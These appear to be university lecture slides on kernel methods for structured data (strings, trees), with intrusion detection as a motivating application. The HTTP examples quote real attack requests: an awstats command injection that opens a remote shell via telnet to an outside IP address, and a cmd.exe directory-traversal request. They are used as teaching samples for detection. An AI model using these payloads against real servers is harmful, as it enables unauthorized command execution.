
Lecture 9: Kernel Methods for Structured Inputs

Pavel Laskov, Blaine Nelson
Cognitive Systems Group
Wilhelm Schickard Institute for Computer Science
Universität Tübingen, Germany

Advanced Topics in Machine Learning
July 3, 2012


What We Have Learned So Far

[Figure: training data enclosed by a hypersphere with center c* and radius r*]

Learning problems are defined in terms of kernel functions reflecting the geometry of the training data.

What if the data does not naturally belong to inner product spaces?


Example: Intrusion Detection

> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a\x0d\x0a

> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.thedailywtf.com\x0d\x0a\x0d\x0a


Examples of Structured Input Data

Histograms
Strings
Trees (e.g., parse trees for "Jeff ate the apple" and "John hit the red car")
Graphs


Convolution Kernels in a Nutshell

Decompose structured objects into comparable parts.

Aggregate the values of similarity measures for individual parts.


R-Convolution

Let $X$ be a set of composite objects (e.g., cars), and let $X_1, \ldots, X_D$ be sets of parts (e.g., wheels, brakes, etc.). All sets are assumed countable.

Let $R$ denote the relation "being part of":

$$R(x_1, \ldots, x_D, x) = 1 \text{ iff } x_1, \ldots, x_D \text{ are parts of } x$$

Writing $\bar{x} = (x_1, \ldots, x_D)$ for a tuple of parts, the inverse relation $R^{-1}$ is defined as:

$$R^{-1}(x) = \{\bar{x} : R(\bar{x}, x) = 1\}$$

In other words, for each object $x$, $R^{-1}(x)$ is the set of part tuples that compose $x$.

We say that $R$ is finite if $R^{-1}(x)$ is finite for all $x \in X$.


R-Convolution: A Naive Example


[Figure: two cars, an Alfa Romeo Junior and a Lada Niva, compared part by part: wheels, headlights, bumpers, transmission, differential, tow coupling, ...]


R-Convolution: Further Examples

Let $\bar{x}$ be a $D$-tuple in $X = X_1 \times \ldots \times X_D$, and let each of the $D$ components of $x \in X$ be a part of $x$. Then $R(\bar{x}, x) = 1$ iff $\bar{x} = x$.


Let $X_1 = X_2 = X$ be the set of all finite strings over a finite alphabet. Define $R(x_1, x_2, x) = 1$ iff $x = x_1 \circ x_2$, i.e., $x$ is the concatenation of $x_1$ and $x_2$.


Let $X_1 = \ldots = X_D = X$ be a set of $D$-degree ordered and rooted trees. Define $R(\bar{x}, x) = 1$ iff $x_1, \ldots, x_D$ are the $D$ subtrees of the root of $x \in X$.
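As a concrete illustration, a minimal Python sketch (not from the slides) can enumerate $R^{-1}(x)$ for the concatenation relation above:

```python
def decompositions(x):
    """R^{-1}(x) for the concatenation relation: all pairs of strings
    (x1, x2) such that x == x1 + x2."""
    return [(x[:i], x[i:]) for i in range(len(x) + 1)]

print(decompositions("ab"))  # [('', 'ab'), ('a', 'b'), ('ab', '')]
```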


R-Convolution Kernel

Definition

Let $x, y \in X$ and let $\bar{x}$ and $\bar{y}$ be the corresponding tuples of parts. Let $K_d(\bar{x}_d, \bar{y}_d)$ be a kernel between the $d$-th parts of $x$ and $y$ ($1 \le d \le D$). Then the convolution kernel between $x$ and $y$ is defined as:

$$K(x, y) = \sum_{\bar{x} \in R^{-1}(x)} \sum_{\bar{y} \in R^{-1}(y)} \prod_{d=1}^{D} K_d(\bar{x}_d, \bar{y}_d)$$
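The definition translates directly into code. Below is a naive sketch (assuming a user-supplied `parts` function that enumerates $R^{-1}$); it is exponential in general and only meant to mirror the formula:

```python
def convolution_kernel(x, y, parts, part_kernels):
    """Sum, over all part decompositions of x and y, of the product
    of part-wise kernels K_d (the R-convolution definition)."""
    total = 0.0
    for xb in parts(x):          # xb ranges over R^{-1}(x)
        for yb in parts(y):      # yb ranges over R^{-1}(y)
            prod = 1.0
            for Kd, xd, yd in zip(part_kernels, xb, yb):
                prod *= Kd(xd, yd)
            total += prod
    return total
```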


Examples of R-Convolution Kernels

The RBF kernel is a convolution kernel. Let each of the $D$ dimensions of $x$ be a part, and let $K_d(x_d, y_d) = e^{-(x_d - y_d)^2 / 2\sigma^2}$. Then

$$K(x, y) = \prod_{d=1}^{D} e^{-(x_d - y_d)^2 / 2\sigma^2} = e^{-\sum_{d=1}^{D} (x_d - y_d)^2 / 2\sigma^2} = e^{-\|x - y\|^2 / 2\sigma^2}$$


The linear kernel $K(x, y) = \sum_{d=1}^{D} x_d y_d$ is not a convolution kernel, except for the trivial "single part" decomposition. For any other decomposition, we would need to sum products of more than one term, which contradicts the formula for the linear kernel.
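A quick numerical sanity check of the RBF factorization above (a minimal NumPy sketch, not from the slides):

```python
import numpy as np

rng = np.random.default_rng(0)
x, y = rng.normal(size=5), rng.normal(size=5)
sigma = 1.3

# Product of per-dimension RBF part kernels ...
per_dim = np.prod(np.exp(-(x - y) ** 2 / (2 * sigma ** 2)))
# ... equals the RBF kernel on the full vectors.
full = np.exp(-np.linalg.norm(x - y) ** 2 / (2 * sigma ** 2))
assert np.isclose(per_dim, full)
```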


Subset Product Kernel

Theorem

Let $K$ be a kernel on a set $U \times U$. Then for all finite, non-empty subsets $A, B \subseteq U$,

$$K'(A, B) = \sum_{x \in A} \sum_{y \in B} K(x, y)$$

is a valid kernel.


Proof.

Goal: show that $K'(A, B)$ is an inner product in some space...

Recall that for any point $u \in U$, $K(u, \cdot)$ is a function $K_u$ in some RKHS $\mathcal{H}$. Let $f_A = \sum_{u \in A} K_u$ and $f_B = \sum_{u \in B} K_u$. Define

$$\langle f_A, f_B \rangle := \sum_{x \in A} \sum_{y \in B} K(x, y)$$

We need to show that this satisfies the properties of an inner product... Let $f_C = \sum_{u \in C} K_u$. Clearly,

$$\langle f_A + f_C, f_B \rangle = \sum_{x \in A \cup C} \sum_{y \in B} K(x, y) = \sum_{x \in A} \sum_{y \in B} K(x, y) + \sum_{x \in C} \sum_{y \in B} K(x, y)$$

Other properties of the inner product can be proved similarly.
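The theorem can also be checked numerically: Gram matrices of $K'$ over random finite subsets should be positive semidefinite. A small illustrative sketch (not from the slides), with an RBF base kernel on $U = \mathbb{R}$:

```python
import numpy as np

rng = np.random.default_rng(1)
rbf = lambda x, y: np.exp(-(x - y) ** 2)  # base kernel K on U = R

# Random finite, non-empty subsets of U.
subsets = [rng.normal(size=rng.integers(1, 6)) for _ in range(8)]

def K_prime(A, B):
    # Subset product kernel: sum K(x, y) over all pairs in A x B.
    return sum(rbf(x, y) for x in A for y in B)

gram = np.array([[K_prime(A, B) for B in subsets] for A in subsets])
# All eigenvalues should be non-negative up to numerical error.
assert np.linalg.eigvalsh(gram).min() > -1e-9
```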


Back to the R-Convolution Kernel

Theorem

$$K(x, y) = \sum_{\bar{x} \in R^{-1}(x)} \sum_{\bar{y} \in R^{-1}(y)} \prod_{d=1}^{D} K_d(\bar{x}_d, \bar{y}_d)$$

is a valid kernel.


Proof.

Let $U = X_1 \times \ldots \times X_D$. From the closure of kernels under the tensor product, it follows that

$$K(\bar{x}, \bar{y}) = \prod_{d=1}^{D} K_d(\bar{x}_d, \bar{y}_d)$$

is a kernel on $U \times U$. Applying the Subset Product Kernel Theorem for $A = R^{-1}(x)$, $B = R^{-1}(y)$, the theorem's claim follows.


End of Theory ☺


Convolution Kernels for Strings

Let $x, y \in A^*$ be two strings generated from the alphabet $A$. How can we define $K(x, y)$ using the ideas of convolution kernels?


Let $D = 1$ and take $X_1$ to be the set of all possible strings of length $n$ ("$n$-grams") generated from the alphabet $A$; $|X_1| = |A|^n$.

For any $x \in A^*$ and any $\bar{x} \in X_1$, define $R(\bar{x}, x) = 1$ iff $\bar{x} \subseteq x$, i.e., $\bar{x}$ occurs as a substring of $x$.

Then $R^{-1}(x)$ is the set of all $n$-grams contained in $x$.

Define $K_1(\bar{x}, \bar{y}) = 1_{[\bar{x} = \bar{y}]}$.


$$K(x, y) = \sum_{\bar{x} \in R^{-1}(x)} \sum_{\bar{y} \in R^{-1}(y)} 1_{[\bar{x} = \bar{y}]}$$
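In code, this kernel boils down to counting matching $n$-gram pairs. A minimal sketch (assuming occurrences are counted with multiplicity, which matches the embedding view introduced below):

```python
from collections import Counter

def ngram_counts(s, n):
    """Histogram of the n-grams (length-n substrings) occurring in s."""
    return Counter(s[i:i + n] for i in range(len(s) - n + 1))

def ngram_kernel(x, y, n):
    """Number of matching n-gram occurrence pairs between x and y."""
    cx, cy = ngram_counts(x, n), ngram_counts(y, n)
    return sum(cx[g] * cy[g] for g in cx.keys() & cy.keys())

print(ngram_kernel("abrakadabra", "barakobama", 2))  # -> 3
```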


Convolution Kernels for Strings (ctd.)

An alternative definition of a kernel for two strings can be obtained as follows:

Let $D = 1$ and take $X_1$ to be the set of all possible strings of arbitrary length generated from the alphabet $A$; $|X_1| = \infty$.

For any $x \in A^*$ and any $\bar{x} \in X_1$, define $R(\bar{x}, x) = 1$ iff $\bar{x} \subseteq x$.

Then $R^{-1}(x)$ is the set of all substrings contained in $x$.

Define $K_1(\bar{x}, \bar{y}) = 1_{[\bar{x} = \bar{y}]}$.

$$K(x, y) = \sum_{\bar{x} \in R^{-1}(x)} \sum_{\bar{y} \in R^{-1}(y)} 1_{[\bar{x} = \bar{y}]}$$

Notice that the size of the summation remains finite despite the infinite dimensionality of $X_1$.


Geometry of String Kernels

Sequences:

1. blabla blubla blablabu aa
2. bla blablaa bulab bb abla
3. a blabla blabla ablub bla
4. blab blab abba blabla blu

[Figure: each sequence is mapped to a histogram over subsequence features (a, b, aa, bb, ab, ba, la, bu, bla, blu, lab, lub, ...); these histograms induce the geometry in which the four sequences are compared.]


Metric Embedding of Strings

Define the language $S \subseteq A^*$ of possible features, e.g., $n$-grams, words, all subsequences.

For each sequence $x$, count the occurrences of each feature in it:

$$\phi : x \longmapsto (\phi_s(x))_{s \in S}$$

Use $\phi_s(x)$ as the $s$-th coordinate of $x$ in the vector space of dimensionality $|S|$.

Define $K(x, y) := \langle \phi(x), \phi(y) \rangle$. This is equivalent to $K(x, y)$ defined by the convolution kernel!


Similarity Measure for Embedded Strings

Metric embedding enables the application of various vectorial similarity measures to sequences, e.g.:

Kernels $K(x, y)$:
  Linear:     $\sum_{s \in S} \phi_s(x)\,\phi_s(y)$
  RBF:        $\exp(-d(x, y)^2 / \sigma)$

Distances $d(x, y)$:
  Manhattan:  $\sum_{s \in S} |\phi_s(x) - \phi_s(y)|$
  Minkowski:  $\sqrt[k]{\sum_{s \in S} |\phi_s(x) - \phi_s(y)|^k}$
  Hamming:    $\sum_{s \in S} \operatorname{sgn} |\phi_s(x) - \phi_s(y)|$
  Chebyshev:  $\max_{s \in S} |\phi_s(x) - \phi_s(y)|$

Similarity coefficients: Jaccard, Kulczynski, ...
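These measures all operate on the sparse histograms $\phi(x)$. A short sketch of two of them over $n$-gram embeddings (illustrative only, not the authors' implementation):

```python
from collections import Counter

def embed(s, n=2):
    """Sparse n-gram histogram phi(s)."""
    return Counter(s[i:i + n] for i in range(len(s) - n + 1))

def manhattan(px, py):
    # Sum |phi_s(x) - phi_s(y)| over the union of non-zero features.
    return sum(abs(px[s] - py[s]) for s in px.keys() | py.keys())

def chebyshev(px, py):
    # Largest per-feature count difference.
    return max(abs(px[s] - py[s]) for s in px.keys() | py.keys())

px, py = embed("abrakadabra"), embed("barakobama")
print(manhattan(px, py), chebyshev(px, py))
```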


Embedding example

X = abrakadabra
Y = barakobama


1-gram embedding:

s   φ_s(X)  φ_s(Y)  φ_s(X)·φ_s(Y)
a   5       4       20
b   2       2       4
d   1       0       0
k   1       1       1
m   0       1       0
o   0       1       0
r   2       1       2

‖X‖ = 5.92, ‖Y‖ = 4.90, X·Y = 27, ∠XY = 21.5°

2-gram embedding:

s   φ_s(X)  φ_s(Y)  φ_s(X)·φ_s(Y)
ab  2       0       0
ad  1       0       0
ak  1       1       1
am  0       1       0
ar  0       1       0
ba  0       2       0
br  2       0       0
da  1       0       0
ka  1       0       0
ko  0       1       0
ma  0       1       0
ob  0       1       0
ra  2       1       2

‖X‖ = 4.00, ‖Y‖ = 3.46, X·Y = 3, ∠XY = 77.5°
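The angles above can be reproduced with a few lines of code (a sketch; small rounding differences aside):

```python
import math
from collections import Counter

def angle_deg(x, y, n):
    """Angle between the n-gram embeddings of two strings."""
    px = Counter(x[i:i + n] for i in range(len(x) - n + 1))
    py = Counter(y[i:i + n] for i in range(len(y) - n + 1))
    dot = sum(px[s] * py[s] for s in px.keys() & py.keys())
    nx = math.sqrt(sum(v * v for v in px.values()))
    ny = math.sqrt(sum(v * v for v in py.values()))
    return math.degrees(math.acos(dot / (nx * ny)))

print(angle_deg("abrakadabra", "barakobama", 1))  # ~21 degrees
print(angle_deg("abrakadabra", "barakobama", 2))  # ~77 degrees
```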


Implementation of String Kernels

General observations

The embedding space has huge dimensionality but is very sparse; at most a linear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either the intersection or the union of the sets of non-zero features in each sample.


Implementation strategies

Explicit but sparse representation of feature vectors

⇒ sorted arrays or hash tables

Implicit and general representations

⇒ tries, suffix trees, suffix arrays


String Kernels using Sorted Arrays

Store all features in sorted arrays

Traverse the feature arrays of two samples to find matching elements:

φ(x): aa (3), ab (3), bc (2), cc (1)
φ(z): ab (2), ba (2), bb (1), bc (4)

Running time: sorting O(n), comparison O(n).
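The comparison step is a linear-time merge of the two sorted arrays. A minimal sketch (hypothetical representation: lists of (feature, count) pairs sorted by feature):

```python
def sorted_dot(fx, fz):
    """Dot product of sparse feature vectors stored as sorted arrays."""
    i, j, total = 0, 0, 0
    while i < len(fx) and j < len(fz):
        if fx[i][0] == fz[j][0]:      # matching feature
            total += fx[i][1] * fz[j][1]
            i, j = i + 1, j + 1
        elif fx[i][0] < fz[j][0]:
            i += 1
        else:
            j += 1
    return total

phi_x = [("aa", 3), ("ab", 3), ("bc", 2), ("cc", 1)]
phi_z = [("ab", 2), ("ba", 2), ("bb", 1), ("bc", 4)]
print(sorted_dot(phi_x, phi_z))  # ab: 3*2 + bc: 2*4 = 14
```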


String Kernels using Generalized Suffix Trees

2-gram counts for "abbaa" and "baaaa", read off a generalized suffix tree:

2-gram   "abbaa"   "baaaa"
aa       1         3
ab       1         0
ba       1         1
bb       1         0

"abbaa" · "baaaa" = 1·3 + 1·1 = 4

[Figure: generalized suffix tree of "abbaa#" and "baaaa$"; each node is annotated with the number of suffixes of each string passing through it, from which the matching 2-gram counts are obtained.]


Tree Kernels: Motivation

Trees are ubiquitous representations in various applications:

Parsing: parse trees
Content representation: XML, DOM
Bioinformatics: phylogeny

Ad-hoc features related to trees, e.g., the number of nodes or edges, are not informative for learning. Structural properties of trees, on the other hand, may be very discriminative.


Example: Normal HTTP Request

GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>

Referer: http://host/<NL> Connection: keep-alive<NL>

<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /test.gif
    <version> HTTP/1.1
    <reqhdr>
      <hdr> 1
        <hdrkey> Accept:
        <hdrval> */*
      <hdr> 2
        <hdrkey> Referer:
        <hdrval> http://host
      <hdr> 3
        <hdrkey> Connection:
        <hdrval> keep-alive


Example: Malicious HTTP Request

GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0

<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /scripts/..%%35c../.../cmd.exe?
      <getparamlist>
        <getparam>
          <getkey> /c+dir+c:\
    <version> HTTP/1.0


Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolution kernel framework:

Let $D = 1$ and $X_1 = X$ be the set of all trees; $|X_1| = |X| = \infty$.

For any $x \in X$ and any $\bar{x} \in X_1$, define $R(\bar{x}, x) = 1$ iff $\bar{x} \subseteq x$, i.e., $\bar{x}$ is a subtree of $x$.

Then $R^{-1}(x)$ is the set of all subtrees contained in $x$.

Define $K_1(\bar{x}, \bar{y}) = 1_{[\bar{x} = \bar{y}]}$.

$$K(x, y) = \sum_{\bar{x} \in R^{-1}(x)} \sum_{\bar{y} \in R^{-1}(y)} 1_{[\bar{x} = \bar{y}]}$$


☹ Problem: Testing for equality between two trees may be extremely costly!


Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of the subtree relationship: $x \subseteq y$ and $y \subseteq z$ $\Rightarrow$ $x \subseteq z$.

Necessary condition for equality: two trees are equal only if all of their subtrees are equal.


Recursive scheme

Let $\mathrm{Ch}(x)$ denote the set of immediate children of the root of (sub)tree $x$, and let $|x| := |\mathrm{Ch}(x)|$.

If $\mathrm{Ch}(x) \neq \mathrm{Ch}(y)$, return 0.

If $|x| = |y| = 0$ (both roots are leaves), return 1.

Otherwise return

$$K(x, y) = \prod_{i=1}^{|x|} \left(1 + K(x_i, y_i)\right)$$
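A direct transcription of this scheme (a sketch; it assumes children are compared by their labels and matched in order):

```python
from dataclasses import dataclass, field

@dataclass
class Node:
    label: str
    children: list = field(default_factory=list)

def tree_kernel(x, y):
    """Recursive tree kernel following the scheme above."""
    if [c.label for c in x.children] != [c.label for c in y.children]:
        return 0                      # immediate children differ
    if not x.children:                # both roots are leaves
        return 1
    k = 1
    for xi, yi in zip(x.children, y.children):
        k *= 1 + tree_kernel(xi, yi)  # product over paired subtrees
    return k

a = Node("S", [Node("NP"), Node("VP", [Node("V"), Node("NP")])])
b = Node("S", [Node("NP"), Node("VP", [Node("V"), Node("NP")])])
print(tree_kernel(a, b))
```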


Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.


Add one for the nodes themselves (subtrees of cardinality 1).


Add counts for all matching subtrees.


Multiply together and return the total count.


Summary

Kernels for structured data extend learning methods to a vast variety of practical data types.

A generic framework for handling structured data is offered by convolution kernels.

Special data structures and algorithms are needed for efficiency.

Extensive range of applications: natural language processing, bioinformatics, computer security.


Bibliography I

[1] M. Collins and N. Duffy. Convolution kernels for natural language. In Advances in Neural Information Processing Systems (NIPS), volume 16, pages 625–632, 2002.

[2] D. Haussler. Convolution kernels on discrete structures. Technical Report UCSC-CRL-99-10, UC Santa Cruz, July 1999.

[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for sequential data. Journal of Machine Learning Research, 9:23–48, 2008.
